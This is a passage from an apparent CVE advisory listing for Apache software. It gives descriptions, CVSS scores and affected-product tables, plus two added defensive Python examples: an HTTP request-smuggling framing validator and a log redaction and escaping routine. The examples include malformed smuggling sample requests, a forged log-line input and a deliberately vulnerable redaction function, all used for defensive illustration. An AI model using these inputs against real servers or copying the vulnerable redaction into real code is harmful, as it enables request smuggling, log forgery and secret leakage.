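    return parts[0], parts[1], parts[2], headers


def validate_framing(raw: bytes) -> Dict[str, object]:
    """Return the framing a conforming parser would use, or raise FramingError."""
    method, _target, _version, headers = parse_request_head(raw)
    # CVE-2021-33193 class: a method holding CR/LF/space/controls can be
    # re-serialised by a proxy into a second request.
    if not is_valid_method(method):
        raise FramingError(f"invalid method token: {method!r}")
    cl_values = [v for n, v in headers if n == "content-length"]
    te_values = [v for n, v in headers if n == "transfer-encoding"]
    # CVE-2021-32565 class: every Content-Length must be plain decimal and
    # duplicates must agree, otherwise two hops may choose different lengths.
    for v in cl_values:
        if _CONTENT_LENGTH.fullmatch(v) is None:
            raise FramingError(f"invalid Content-Length value: {v!r}")
    if len(set(cl_values)) > 1:
        raise FramingError(f"conflicting Content-Length values: {cl_values}")
    if te_values:
        # RFC 7230 3.3.3 says TE wins over CL, but a proxy should refuse the
        # combination rather than hope every downstream hop agrees.
        if cl_values:
            raise FramingError("both Transfer-Encoding and Content-Length present")
        codings = [c.strip().lower() for v in te_values for c in v.split(",")]
        # CVE-2021-33037 class: 'identity' is not a transfer-coding any more,
        # and 'chunked' must appear exactly once, as the final coding.
        if "identity" in codings:
            raise FramingError("'identity' transfer-coding is not allowed")
        if codings.count("chunked") != 1 or codings[-1] != "chunked":
            raise FramingError(f"chunked must be the final transfer-coding: {codings}")
        return {"method": method, "framing": "chunked"}
    length = int(cl_values[0]) if cl_values else 0
    return {"method": method, "framing": "content-length", "length": length}


def check(raw: bytes) -> str:
    """Convenience wrapper: 'ok: <framing>' or 'reject: <reason>'."""
    try:
        return "ok: " + str(validate_framing(raw)["framing"])
    except FramingError as exc:
        return f"reject: {exc}"


# Constructed sample requests: two clean ones, then one per failure class.
SAMPLE_REQUESTS = {
    "clean": b"POST /api HTTP/1.1\r\nHost: example.test\r\nContent-Length: 5\r\n\r\nhello",
    "chunked": b"POST /api HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding: gzip, chunked\r\n\r\n0\r\n\r\n",
    "cl_plus_sign": b"POST /api HTTP/1.1\r\nHost: example.test\r\nContent-Length: +5\r\n\r\nhello",
    "cl_conflict": b"POST /api HTTP/1.1\r\nHost: example.test\r\nContent-Length: 5\r\nContent-Length: 6\r\n\r\nhello!",
    "cl_and_te": b"POST /api HTTP/1.1\r\nHost: example.test\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "te_identity": b"POST /api HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding: identity\r\n\r\nhello",
    "te_chunked_not_last": b"POST /api HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding: chunked, gzip\r\n\r\n0\r\n\r\n",
    "bad_method": b"GET\x01 /x HTTP/1.1\r\nHost: example.test\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLE_REQUESTS.items():
        print(f"{name:20} {check(raw)}")
```

For the HTTP/2 case the method arrives as the `:method` pseudo-header rather than on a request line, so `is_valid_method` is the check to apply before the request is re-serialised as HTTP/1.1 towards an origin; the sample `bad_method` request only shows the same rule on the HTTP/1.1 side.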

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle secure_backup *
tenable tenable.sc *
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
CVE-2021-33580 MEDIUM

User controlled `request.getHeader("Referer")`, `request.getRequestURL()` and `request.getQueryString()` are used to build and run a regex expression. The attacker doesn't have to use a browser and may send a specially crafted Referer header programmatically. Since the attacker controls the string and the regex pattern he may cause a ReDoS by regex catastrophic backtracking on the server side. This problem has been fixed in Roller 6.0.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache roller *
CVE-2021-33813 MEDIUM

An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
fedoraproject fedora 35
debian debian_linux 9.0
apache solr 8.8.1
apache solr 8.9
oracle communications_messaging_server 8.1
apache tika 1.25
jdom jdom *
CVE-2021-33900 MEDIUM

While investigating DIRSTUDIO-1219 it was noticed that configured StartTLS encryption was not applied when any SASL authentication mechanism (DIGEST-MD5, GSSAPI) was used. While investigating DIRSTUDIO-1220 it was noticed that any configured SASL confidentiality layer was not applied. This issue affects Apache Directory Studio version 2.0.0.v20210213-M16 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-311,CWE-319,

Products Affected

Vendor Product Version
apache directory_studio 2.0.0
apache directory_studio *
CVE-2021-34538

In Apache Hive before 3.1.3, the "CREATE" and "DROP" function operations do not check for the necessary authorization of the entities involved in the query. It was found that an unauthorized user can manipulate an existing UDF without having the privileges to do so. This allowed unauthorized or underprivileged users to drop and recreate UDFs, pointing them to new jars that could potentially be malicious.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache hive *
CVE-2021-34797 MEDIUM

Apache Geode versions up to 1.12.4 and 1.13.4 are vulnerable to a log file redaction of sensitive information flaw when using values that begin with characters other than letters or numbers for passwords and security properties with the prefix "sysprop-", "javax.net.ssl", or "security-". This issue is fixed by overhauling the log file redaction in Apache Geode versions 1.12.5, 1.13.5, and 1.14.0.
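Two advisories on this page are about what ends up in a log line: CVE-2021-31164 (Apache Unomi, where unescaped CR/LF in a logged value lets a client fabricate whole records) and CVE-2021-34797 above (Apache Geode, where redaction depended on the first character of the value and so missed secrets starting with punctuation). The following is an added example, not code from Unomi or Geode, showing the two defences together: redaction decided by the key alone, and control characters neutralised before anything is written. The sensitive-key prefixes come from the Geode advisory; the property names and sample values are constructed.

```python
"""Write log lines that cannot be forged and do not leak secrets.

Added example, not code from Apache Unomi or Apache Geode. The sensitive
prefixes are those named in CVE-2021-34797; the keys, values and the
"vulnerable" redaction rule are constructed to illustrate the bug class.
"""
from typing import Mapping

SENSITIVE_PREFIXES = ("sysprop-", "javax.net.ssl", "security-")
SENSITIVE_WORDS = ("password", "secret", "token")
REDACTED = "********"

_CONTROL = {"\r": "\\r", "\n": "\\n", "\t": "\\t"}


def is_sensitive_key(key: str) -> bool:
    k = key.lower()
    return k.startswith(SENSITIVE_PREFIXES) or any(w in k for w in SENSITIVE_WORDS)


def redact_unsafe(key: str, value: str) -> str:
    """Vulnerable shape: redaction also looks at the value, and only values
    that start like an ordinary word are redacted, so '-hunter2' or
    '!secret' are written out verbatim."""
    if is_sensitive_key(key) and value[:1].isalnum():
        return REDACTED
    return value


def redact(key: str, value: str) -> str:
    """Hardened: the decision depends on the key alone, never on the value."""
    return REDACTED if is_sensitive_key(key) else value


def escape_for_log(text: str) -> str:
    """Neutralise CR, LF, TAB and other C0/DEL control characters so one
    value cannot terminate a record or start a forged one."""
    out = []
    for ch in text:
        if ch in _CONTROL:
            out.append(_CONTROL[ch])
        elif ord(ch) < 0x20 or ch == "\x7f":
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(ch)
    return "".join(out)


def format_record(level: str, event: str, fields: Mapping[str, str]) -> str:
    """One record per call: every key and value is redacted, then escaped."""
    parts = [f"{level} {escape_for_log(event)}"]
    for key, value in fields.items():
        parts.append(f"{escape_for_log(key)}={escape_for_log(redact(key, value))}")
    return " ".join(parts)


if __name__ == "__main__":
    # Constructed: a login attempt whose user name carries a forged record.
    forged_user = "mallory\r\nINFO login user=admin result=success"
    print(format_record("WARN", "login", {"user": forged_user, "result": "failure"}))
    print("unsafe:", redact_unsafe("security-password", "-hunter2"))
    print("safe:  ", redact("security-password", "-hunter2"))
```

The order inside `format_record` matters: redaction runs on the raw value so a secret cannot dodge it by containing an escape sequence, and escaping runs last so nothing, including the redaction marker's neighbours, can carry a line break into the file.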

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache geode *
CVE-2021-34798 MEDIUM

Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server *
siemens sinema_server 14.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle http_server 12.2.1.4.0
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
netapp clustered_data_ontap -
oracle enterprise_manager_base_platform 13.5.0.0
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
oracle peoplesoft_enterprise_peopletools 8.58
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.3
broadcom brocade_fabric_operating_system_firmware -
netapp storagegrid -
siemens sinema_remote_connect_server *
oracle http_server 12.2.1.3.0
debian debian_linux 9.0
oracle communications_cloud_native_core_network_function_cloud_native_environment 1.10.0
siemens sinec_nms *
siemens ruggedcom_nms *
debian debian_linux 11.0
tenable tenable.sc *
oracle instantis_enterprisetrack 17.2
CVE-2021-35474 HIGH

Stack-based Buffer Overflow vulnerability in cachekey plugin of Apache Traffic Server. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-121,CWE-787,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2021-35515 MEDIUM

When reading a specially crafted 7Z archive, the construction of the list of codecs that decompress an entry can result in an infinite loop. This could be used to mount a denial of service attack against services that use Compress' sevenz package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-834,CWE-835,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle insurance_policy_administration 11.0.2
oracle business_process_management_suite 12.2.1.3.0
oracle communications_session_route_manager *
oracle commerce_guided_search 11.3.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle insurance_policy_administration 11.1.0
oracle flexcube_universal_banking *
oracle financial_services_enterprise_case_management 8.0.8.1.0
apache commons_compress *
oracle banking_party_management 2.7.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle banking_trade_finance 14.5
oracle banking_digital_experience 20.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle insurance_policy_administration 11.2.8
netapp oncommand_insight -
oracle utilities_testing_accelerator 6.0.0.2.2
oracle primavera_unifier *
oracle communications_diameter_intelligence_hub *
oracle banking_digital_experience 19.1
oracle insurance_policy_administration 11.3.0
oracle communications_cloud_native_core_unified_data_repository 1.14.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle primavera_unifier 20.12
oracle banking_enterprise_default_management 2.7.0
oracle banking_payments 14.5
oracle banking_digital_experience *
oracle primavera_unifier 18.8
oracle flexcube_universal_banking 14.5.0
oracle flexcube_universal_banking 12.4.0
oracle communications_billing_and_revenue_management 12.0.0.4
oracle banking_treasury_management 14.5
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle business_process_management_suite 12.2.1.4.0
netapp active_iq_unified_manager -
oracle primavera_unifier 19.12
oracle utilities_testing_accelerator 6.0.0.3.1
oracle communications_cloud_native_core_automated_test_suite 1.8.0
oracle communications_messaging_server 8.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle insurance_policy_administration 11.3.1
CVE-2021-35516 MEDIUM

When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,CWE-770,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle insurance_policy_administration 11.0.2
oracle business_process_management_suite 12.2.1.3.0
oracle communications_session_route_manager *
oracle commerce_guided_search 11.3.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle insurance_policy_administration 11.1.0
oracle flexcube_universal_banking *
oracle financial_services_enterprise_case_management 8.0.8.1.0
apache commons_compress *
oracle flexcube_universal_banking 14.5
oracle banking_party_management 2.7.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle banking_digital_experience 20.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle insurance_policy_administration 11.2.8
netapp oncommand_insight -
oracle utilities_testing_accelerator 6.0.0.2.2
oracle primavera_unifier *
oracle communications_diameter_intelligence_hub *
oracle banking_digital_experience 19.1
oracle insurance_policy_administration 11.3.0
oracle communications_cloud_native_core_unified_data_repository 1.14.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle primavera_unifier 20.12
oracle banking_enterprise_default_management 2.7.0
oracle webcenter_portal 12.2.1.3.0
oracle banking_digital_experience *
oracle primavera_unifier 18.8
oracle webcenter_portal 12.2.1.4.0
oracle banking_digital_experience 19.2
oracle flexcube_universal_banking 12.4.0
oracle communications_billing_and_revenue_management 12.0.0.4
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle business_process_management_suite 12.2.1.4.0
netapp active_iq_unified_manager -
oracle primavera_unifier 19.12
oracle utilities_testing_accelerator 6.0.0.3.1
oracle communications_cloud_native_core_automated_test_suite 1.8.0
oracle communications_messaging_server 8.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle insurance_policy_administration 11.3.1
CVE-2021-35517 MEDIUM

When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,CWE-770,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle business_process_management_suite 12.2.1.3.0
oracle insurance_policy_administration 11.1.0
oracle financial_services_enterprise_case_management 8.0.8.1.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle banking_trade_finance 14.5
oracle banking_digital_experience 20.1
oracle insurance_policy_administration 11.2.8
oracle primavera_unifier *
oracle banking_digital_experience 19.1
oracle communications_cloud_native_core_unified_data_repository 1.14.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle banking_payments 14.5
oracle webcenter_portal 12.2.1.3.0
oracle banking_digital_experience *
oracle primavera_unifier 18.8
oracle webcenter_portal 12.2.1.4.0
oracle banking_digital_experience 19.2
oracle banking_apis *
oracle banking_treasury_management 14.5
oracle primavera_unifier 19.12
oracle utilities_testing_accelerator 6.0.0.3.1
oracle banking_apis 19.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle banking_apis 20.1
oracle insurance_policy_administration 11.3.1
oracle insurance_policy_administration 11.0.2
oracle communications_session_route_manager *
oracle commerce_guided_search 11.3.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle banking_apis 21.1
oracle flexcube_universal_banking *
apache commons_compress *
oracle flexcube_universal_banking 14.5
oracle banking_party_management 2.7.0
oracle flexcube_universal_banking 12.4
oracle peoplesoft_enterprise_peopletools 8.58
netapp oncommand_insight -
oracle utilities_testing_accelerator 6.0.0.2.2
oracle communications_diameter_intelligence_hub *
oracle insurance_policy_administration 11.3.0
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle primavera_unifier 20.12
oracle banking_enterprise_default_management 2.7.0
oracle communications_billing_and_revenue_management 12.0.0.4
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle business_process_management_suite 12.2.1.4.0
netapp active_iq_unified_manager -
oracle banking_apis 19.2
oracle communications_messaging_server 8.1
CVE-2021-35936 MEDIUM

If remote logging is not used, the worker (in the case of CeleryExecutor) or the scheduler (in the case of LocalExecutor) runs a Flask logging server that listens on a specific port and, by default, binds to 0.0.0.0. This logging server had no authentication and allowed reading the log files of DAG jobs. This issue affects Apache Airflow < 2.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-306,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-35940 LOW

An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.

CVSS 2.0

Severity: LOW

Problem Type: CWE-125,

Products Affected

Vendor Product Version
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
apache portable_runtime 1.7.0
CVE-2021-36090 MEDIUM

When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle business_process_management_suite 12.2.1.3.0
oracle communications_unified_inventory_management 7.4.2
oracle insurance_policy_administration 11.1.0
oracle financial_services_enterprise_case_management 8.0.8.1.0
oracle communications_unified_inventory_management 7.4.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle primavera_gateway *
oracle banking_trade_finance 14.5
oracle banking_digital_experience 20.1
oracle insurance_policy_administration 11.2.8
oracle communications_unified_inventory_management 7.5.0
oracle primavera_unifier *
oracle banking_digital_experience 19.1
oracle communications_diameter_intelligence_hub 8.2.3
oracle communications_cloud_native_core_unified_data_repository 1.14.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle banking_payments 14.5
oracle webcenter_portal 12.2.1.3.0
oracle banking_digital_experience *
oracle primavera_unifier 18.8
oracle webcenter_portal 12.2.1.4.0
oracle banking_digital_experience 19.2
oracle banking_apis *
oracle banking_treasury_management 14.5
oracle primavera_unifier 19.12
oracle utilities_testing_accelerator 6.0.0.3.1
oracle banking_apis 19.1
oracle banking_platform 2.9.0
oracle banking_platform 2.6.2
oracle banking_platform 2.7.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle banking_apis 20.1
oracle insurance_policy_administration 11.3.1
oracle insurance_policy_administration 11.0.2
oracle communications_session_route_manager *
oracle commerce_guided_search 11.3.2
oracle financial_services_enterprise_case_management *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle financial_services_analytical_applications_infrastructure *
oracle banking_apis 21.1
oracle flexcube_universal_banking *
apache commons_compress *
oracle flexcube_universal_banking 14.5
oracle banking_party_management 2.7.0
oracle flexcube_universal_banking 12.4
oracle communications_unified_inventory_management 7.4.1
oracle communications_session_report_manager *
oracle peoplesoft_enterprise_peopletools 8.58
netapp oncommand_insight -
oracle utilities_testing_accelerator 6.0.0.2.2
oracle banking_platform 2.12.0
oracle communications_diameter_intelligence_hub *
oracle communications_element_manager *
oracle insurance_policy_administration 11.3.0
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle primavera_unifier 20.12
oracle banking_enterprise_default_management 2.7.0
oracle communications_billing_and_revenue_management 12.0.0.4
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle business_process_management_suite 12.2.1.4.0
netapp active_iq_unified_manager -
oracle banking_apis 19.2
oracle communications_cloud_native_core_automated_test_suite 1.8.0
oracle communications_messaging_server 8.1
CVE-2021-36151 LOW

In Apache Gobblin, the Hadoop token is written to a temp file that is visible to all local users on Unix-like systems. This affects versions <= 0.15.0. Users should update to version 0.16.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache gobblin *
CVE-2021-36152 HIGH

Apache Gobblin trusts all certificates used for LDAP connections in Gobblin-as-a-Service. This affects versions <= 0.15.0. Users should update to version 0.16.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache gobblin *
CVE-2021-36160 MEDIUM

A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
apache http_server *
oracle http_server 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle communications_cloud_native_core_network_function_cloud_native_environment 1.10.0
debian debian_linux 10.0
debian debian_linux 11.0
netapp clustered_data_ontap -
oracle enterprise_manager_base_platform 13.5.0.0
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
oracle peoplesoft_enterprise_peopletools 8.58
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
broadcom brocade_fabric_operating_system_firmware -
netapp storagegrid -
CVE-2021-36161 HIGH

Some components in Dubbo will try to print the formatted string of the input arguments, which can lead to RCE when a maliciously customized bean has a special toString method. In the latest version, the toString call in timeout, cache and some other places is fixed. Fixed in Apache Dubbo 2.7.13.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-134,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-36162 MEDIUM

Apache Dubbo supports various rules to support configuration override or traffic routing (called routing in Dubbo). These rules are loaded into the configuration center (e.g. Zookeeper, Nacos, ...) and retrieved by the customers when making a request in order to find the right endpoint. When parsing these YAML rules, Dubbo customers use the SnakeYAML library to load the rules, which by default allows calling arbitrary constructors. An attacker with access to the configuration center can poison the rule so that, when it is retrieved by the consumers, RCE is achieved on all of them. This was fixed in Dubbo 2.7.13, 3.0.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-36163 HIGH

In Apache Dubbo, users may choose to use the Hessian protocol. The Hessian protocol is implemented on top of HTTP and passes the body of a POST request directly to a HessianSkeleton: new HessianSkeletons are created without any configuration of the serialization factory and therefore without applying the Dubbo properties for allowed or blocked type lists. In addition, the generic service is always exposed, so attackers do not need to figure out a valid service/method name pair. This is fixed in 2.7.13, 2.6.10.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-36372 HIGH

In Apache Ozone versions prior to 1.2.0, initially generated block tokens are persisted to the metadata database and can be retrieved by authenticated users with permission to the key. Authenticated users may use them even after access is revoked.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-273,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-36373 MEDIUM

When reading a specially crafted TAR archive, an Apache Ant build can be made to allocate large amounts of memory that finally leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Apache Ant versions prior to 1.9.16 and 1.10.11 were affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle retail_financial_integration 16.0.3.0
oracle communications_unified_inventory_management 7.4.2
oracle real-time_decision_server 3.2.0.0
oracle retail_eftlink 19.0.1
oracle communications_unified_inventory_management 7.4.0
oracle retail_financial_integration 15.0.4.0
oracle communications_cloud_native_core_automated_test_suite 1.9.0
oracle retail_bulk_data_integration 19.0.1
oracle utilities_framework 4.4.0.0.0
oracle retail_bulk_data_integration 16.0.3.0
oracle retail_eftlink 20.0.1
oracle retail_central_office 14.1
oracle primavera_gateway *
oracle retail_xstore_point_of_service 20.0.1
oracle banking_trade_finance 14.5
oracle retail_store_inventory_management 16.0
oracle agile_plm 9.3.6
oracle communications_unified_inventory_management 7.5.0
oracle primavera_unifier *
oracle utilities_framework 4.2.0.3.0
oracle retail_xstore_point_of_service 18.0.3
oracle retail_integration_bus 19.0.1.0
oracle retail_xstore_point_of_service 16.0.6
oracle retail_merchandising_system 19.0.1
oracle insurance_policy_administration *
oracle retail_advanced_inventory_planning 14.1
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle retail_back_office 14.0
oracle retail_point-of-service 14.0
oracle retail_invoice_matching 16.0.3
oracle banking_treasury_management 14.5
oracle retail_extract_transform_and_load 13.2.8
oracle retail_predictive_application_server 16.0.3.0
oracle retail_central_office 14.0
oracle primavera_unifier 19.12
oracle retail_advanced_inventory_planning 16.0
oracle retail_advanced_inventory_planning 15.0
oracle utilities_framework 4.2.0.2.0
oracle communications_order_and_service_management 7.3
oracle retail_store_inventory_management 14.1
oracle retail_back_office 14.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle utilities_framework 4.4.0.2.0
oracle retail_financial_integration 14.1.3.2
oracle retail_integration_bus 16.0.3.0
oracle enterprise_repository 11.1.1.7.0
oracle timesten_in-memory_database *
oracle financial_services_analytical_applications_infrastructure *
oracle communications_order_and_service_management 7.4
oracle communications_unified_inventory_management 7.3.0
apache ant *
oracle retail_integration_bus 14.1.3.2
oracle retail_service_backbone 16.0.3.0
oracle communications_unified_inventory_management 7.4.1
oracle retail_predictive_application_server 14.1.3
oracle utilities_framework *
oracle retail_store_inventory_management 15.0
oracle retail_service_backbone 15.0.4.0
oracle real-time_decision_server 11.1.1.9.0
oracle primavera_unifier 20.12
oracle retail_predictive_application_server 15.0.3
oracle utilities_framework 4.4.0.3.0
oracle retail_xstore_point_of_service 19.0.2
oracle retail_integration_bus 15.0.4.0
oracle communications_cloud_native_core_binding_support_function 1.11.0
oracle retail_point-of-service 14.1
oracle retail_service_backbone 14.1.3.2
oracle retail_service_backbone 19.0.1.0
CVE-2021-36374 MEDIUM

